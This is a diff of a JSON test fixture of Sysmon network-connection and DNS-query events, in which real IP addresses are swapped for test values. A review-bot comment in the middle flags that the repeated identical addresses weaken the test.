 "ProcessId": "924",
 "Image": "C:\\Windows\\System32\\svchost.exe",
@@ -3698,7 +3698,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event",
 "provider": "Microsoft-Windows-Sysmon"
@@ -3710,7 +3710,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event",
 "provider": "Microsoft-Windows-Sysmon"
@@ -3742,7 +3742,7 @@
 "Initiated": "true",
 "SourceIp": "10.0.2.15",
 "UtcTime": "2019-03-18 16:57:48.264",
- "DestinationIp": "40.77.226.250",
+ "DestinationIp": "89.160.20.156",
 "DestinationIsIpv6": "false",
 "ProcessId": "4",
 "Protocol": "udp",
@@ -3818,7 +3818,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event",
 "provider": "Microsoft-Windows-Sysmon"
@@ -3834,7 +3834,7 @@
 },
 "event_data": {
 "DestinationIsIpv6": "false",
- "DestinationIp": "169.254.255.255",
+ "DestinationIp": "89.160.20.156",
 "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}",
 "User": "NT AUTHORITY\\SYSTEM",
 "Initiated": "true",
@@ -3869,7 +3869,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3892,7 +3892,7 @@ "ProcessId": "2736", "QueryName": "api-s2s.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;" + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
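Review bot: In the @@ -3869 and @@ -3892 hunks every address of a QueryResults answer list is replaced by the same 89.160.20.156, so four formerly distinct A records now read `::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;`, and the same pattern recurs in @@ -3915, @@ -3944, @@ -3976, @@ -3995 and @@ -4007. A result list made of repeated identical addresses no longer shows whether the pipeline preserves the count, order and uniqueness of the parsed answers; a parser that deduplicated or truncated the list would still match this fixture. Where the supported set offers more than one address I would vary them across a list, and if the QueryResults field is not itself looked up against the GeoIP database (inferred, not visible in this diff) the original values could stay, since only enriched fields need to come from the supported set. The rewrite of the nameserver addresses such as 192.5.6.30 into 192.168.0.0/16 in the later hunks is consistent with private-range test data and needs no change.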
@@ -3915,7 +3915,7 @@
 "ProcessId": "2736",
 "QueryName": "x.bidswitch.net",
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.231.30.22;::ffff:35.196.212.198;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -3944,13 +3944,13 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { "@timestamp": "2021-05-05T15:30:51.701Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 
UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -3976,7 +3976,7 @@ "event_data": { "QueryName": "pixel.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
